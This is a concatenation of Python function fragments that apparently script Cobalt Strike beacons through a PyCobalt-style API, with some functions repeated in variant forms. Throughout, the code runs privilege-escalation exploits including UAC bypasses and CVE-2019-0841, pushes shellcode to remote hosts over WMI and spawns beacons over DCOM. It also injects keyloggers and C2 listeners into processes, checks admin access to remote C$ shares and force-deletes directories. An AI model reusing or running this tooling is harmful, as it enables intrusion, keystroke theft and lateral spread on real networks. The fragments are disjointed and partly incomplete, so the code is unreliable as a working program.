def _(bid, code, *args): aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code)) try: sharpgen.execute(bid, code, *args) except RuntimeError as e: aggressor.berror( bid, 'SharpGen failed. See script console for more details')
def _(bid, exploit, *args): callbacks = { 'token-shellcode': elevate_token_shellcode, 'token-command': elevate_token_command, 'slui-shellcode': elevate_slui_shellcode, 'slui-command': elevate_slui_command, 'fodhelper-shellcode': elevate_fodhelper_shellcode, 'fodhelper-command': elevate_fodhelper_command, 'eventvwr-command': elevate_eventvwr_command, 'wscript-shellcode': elevate_wscript_shellcode, 'wscript-command': elevate_wscript_command, 'runas-shellcode': elevate_runas_shellcode, 'cve-2019-0841': elevate_cve_2019_0841, } if exploit in callbacks: aggressor.btask( bid, 'Tasked beacon to elevate with exploit: {}'.format(exploit)) callback = callbacks[exploit] if not pycobalt.utils.check_args(callback, (bid, ) + args): signature = pycobalt.utils.signature(callback, trim=1) aggressor.berror( bid, 'Invalid arguments to exploit {}. Signature: {}'.format( exploit, signature)) return callback(bid, *args) else: aggressor.berror( bid, 'Exploit must be one of: {}'.format(', '.join(callbacks.keys())))
def alias_callback(*args): # first argument is bid bid = int(args[0]) # see above quote_replacement = quote_replacement_ # check arguments if not utils.check_args(callback, args): syntax = '{} {}'.format(name, utils.signature_command(callback, trim=1)) aggressor.berror(bid, "Syntax: " + syntax) engine.error("Invalid number of arguments passed to alias '{}'. Syntax: {}".format(name, syntax)) return # handle the quote replacement character if not quote_replacement: global _default_quote_replacement quote_replacement = _default_quote_replacement if quote_replacement: args = [arg.replace(quote_replacement, '"') for arg in args] try: # run the alias callback #engine.debug('calling callback for alias {}'.format(name)) callback(*args) except Exception as e: # print exception summaries to the beacon log. raise the # Exception again so the full traceback can get printed to the # Script Console aggressor.berror(bid, "Caught Python exception while executing alias '{}': {}\n See Script Console for more details.".format(name, str(e))) raise e
def _(bid, shellcode, *hosts): if not hosts: aggressor.berror(bid, 'specify some hosts') return for host in hosts: lateral_wmi_shellcode(bid, host, shellcode)
def _(bid, *files): if not files: aggressor.berror('cat: specify some files to cat') return command = '\n'.join(['type {}'.format(f) for f in files]) aggressor.bshell(bid, command)
def error(self, message): if self.bid: # print to beacon console aggressor.berror(self.bid, message) else: # print to script console engine.error(message) raise argparse.ArgumentError('exit')
def _(bid): global _uploaded if not _uploaded: aggressor.berror('Run 7z-init first') return aggressor.brm(bid, _uploaded) _uploaded = None
def _(bid, *dirs): if not dirs: aggressor.berror('rmr: specify some directories to kill') return command = '' for d in dirs: command += 'Remove-Item -Recurse -Force "{}"\n'.format(d) aggressor.bpowerpick(bid, command)
def _(bid, code, *args): aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code)) try: from_cache = sharpgen.execute(bid, code, args, cache=cache) if from_cache: aggressor.blog2(bid, 'Build was retrieved from the cache') except RuntimeError as e: aggressor.berror( bid, 'SharpGen failed. See Script Console for more details.')
def callback(procs): if procs: for proc in procs: out = 'Found {}: {}'.format(proc_name, proc['pid']) if 'arch' in proc: out += ' ({})'.format(proc['arch']) if 'user' in proc: out += ' ({})'.format(proc['user']) aggressor.blog2(bid, out) else: aggressor.berror(bid, 'No processes named {}'.format(proc_name))
def _(bid, *dirs): if not dirs: aggressor.berror(bid, 'rmr: specify some directories to kill') return command = '' for d in dirs: command += 'Remove-Item -Recurse -Force {}\n'.format( powershell_quote(d)) aggressor.btask( bid, 'Tasked beacon to recursively delete: {}'.format(', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *hosts): command = '' if not hosts: aggressor.berror('specify a host') return for host in hosts: command += 'nslookup {}\n'.format(powershell_quote(host)) aggressor.btask( bid, 'Tasked beacon to resolve host(s): {}'.format(', '.join(hosts))) aggressor.bpowerpick(bid, command, silent=True)
def callback(procs): if procs: for proc in procs: out = 'Killing {}: {}'.format(proc_name, proc['pid']) if 'arch' in proc: out += ' ({})'.format(proc['arch']) if 'user' in proc: out += ' ({})'.format(proc['user']) aggressor.btask(bid, out) aggressor.bkill(bid, proc['pid'], silent=True) else: aggressor.berror(bid, 'No processes named {}'.format(proc_name))
def _(bid, *args): global _uploaded if not _uploaded: aggressor.berror('Run 7z-init first') return line = ' '.join(args) aggressor.btask(bid, 'Tasked beacon to run 7zip command: {}'.format(line)) aggressor.bpowerpick( bid, "echo '7zip starting'; {} {} ; echo '7zip finished';".format( _uploaded, line), silent=True)
def _(bid, *files): if not files: aggressor.berror(bid, 'cat: specify some files to cat') return code = helpers.code_string(r""" foreach (string file in args) { var text = System.IO.File.ReadAllText(file); System.Console.Write(text); } """) aggressor.btask( bid, 'Tasked beacon to get contents of: {}'.format(', '.join(files))) sharpgen.execute(bid, code, files)
def parsed_callback(procs): found = None for search in proc_names: for proc in procs: if search == proc['name'] and 'arch' in proc and 'user' in proc: # inject it aggressor.blog( bid, 'Keylogging process {} ({} {})'.format( proc['name'], proc['pid'], proc['arch'])) aggressor.bkeylogger(bid, proc['pid'], proc['arch'], silent=True) return # nothing found aggressor.berror(bid, "Didn't find any processes to inject keylogger")
def parsed_callback(procs): found = None for search in proc_names: for proc in procs: if search == proc['name'] and 'arch' in proc and 'user' in proc: # inject it aggressor.blog( bid, 'Injecting listener {} into process {} ({} {})'.format( listener, proc['name'], proc['pid'], proc['arch'])) aggressor.binject(bid, proc['pid'], listener, proc['arch']) return # nothing found aggressor.berror( bid, "Didn't find any processes to inject listener {}".format(listener))
def _(bid): loaded = aggressor.data_query('cmdlets') if bid in loaded: out = 'Loaded modules:\n' for module in loaded[bid]: if module.lower() in [ 'local', 'that', 'struct', 'field', 'before', 'psenum', 'func', '' ]: # not sure what these are continue out += ' - {}\n'.format(module) aggressor.blog2(bid, out) else: aggressor.berror(bid, 'No loaded modules')
def _(bid, method, host, *args): callbacks = { 'wmi-shellcode': lateral_wmi_shellcode, } if method in callbacks: aggressor.btask(bid, 'Tasked beacon to move laterally with method: {}'.format(method)) callback = callbacks[method] if not pycobalt.utils.check_args(callback, (bid, host) + args): signature = pycobalt.utils.signature(callback, trim=2) aggressor.berror(bid, 'Invalid arguments to method {}. Signature: {}'.format(method, signature)) return host = host.lstrip('\\') callback(bid, host, *args) else: aggressor.berror(bid, 'method must be one of: {}'.format(', '.join(callbacks.keys())))
def alias_callback(*args): bid = int(args[0]) if utils.check_args(callback, args): try: engine.debug('calling callback for alias {}'.format(name)) callback(*args) except Exception as e: aggressor.berror( bid, "Caught Python exception while executing alias '{}': {}\n See Script Console for more details." .format(name, str(e))) raise e else: syntax = '{}{}'.format(name, utils.signature(callback, trim=1)) aggressor.berror(bid, "Syntax: " + syntax) engine.error( "Invalid number of arguments passed to alias '{}'. Syntax: {}". format(name, syntax))
def _(bid, *hosts): command = '' if not hosts: aggressor.berror(bid, 'Specify some hosts to check admin access to') for host in hosts: host = host.lstrip('\\') command += helpers.code_string(r""" ls \\{host}\C$ >$null 2>$null if ($?) {{ Write-Output "You have admin access to \\{host}" }} else {{ Write-Output "You do not have access to \\{host}: $($Error[0].Exception.Message)" }} """, host=host) aggressor.btask(bid, 'Tasked beacon to check access to: ' + ', '.join(hosts)) aggressor.bpowerpick(bid, command, silent=True)
def parsed_callback(procs): for proc in procs: if 'arch' in proc and 'user' in proc: # inject it aggressor.blog( bid, 'Keylogging process {} ({} {})'.format( proc['name'], proc['pid'], proc['arch'])) aggressor.bkeylogger(bid, proc['pid'], proc['arch'], silent=True) return # nothing found if proc_name: aggressor.berror( "Didn't find any processes named '{}' to inject keylogger". format(proc_name)) else: aggressor.berror("Didn't find any processes to inject keylogger")
def _(bid, listener=None, *proc_names): if not proc_names: # defaults proc_names = default_procs if not listener: # select default listener listener = helpers.default_listener() if listener not in aggressor.listeners(): # listener not recognized aggressor.berror(bid, 'Unknown listener: {}'.format(listener)) return def parsed_callback(procs): found = None for search in proc_names: for proc in procs: if search == proc['name'] and 'arch' in proc and 'user' in proc: # inject it aggressor.blog( bid, 'Injecting listener {} into process {} ({} {})'.format( listener, proc['name'], proc['pid'], proc['arch'])) aggressor.binject(bid, proc['pid'], listener, proc['arch']) return # nothing found aggressor.berror( bid, "Didn't find any processes to inject listener {}".format(listener)) def ps_callback(bid, content): procs = helpers.parse_ps(content) parsed_callback(procs) aggressor.btask( bid, 'Tasked beacon to inject listener {} into first accessible process named: {}' .format(listener, ', '.join(proc_names))) aggressor.bps(bid, ps_callback)
def do_dcom(listener): if not aggressor.listener_info(listener): aggressor.berror(bid, "Listener {} does not exist".format(listener)) return aggressor.btask(bid, 'Tasked Beacon to spawn beacon on host "{}" for listener {} using DCOM'.format(target, listener))
def _(bid, *args): msg = ' '.join(args) aggressor.berror(bid, msg)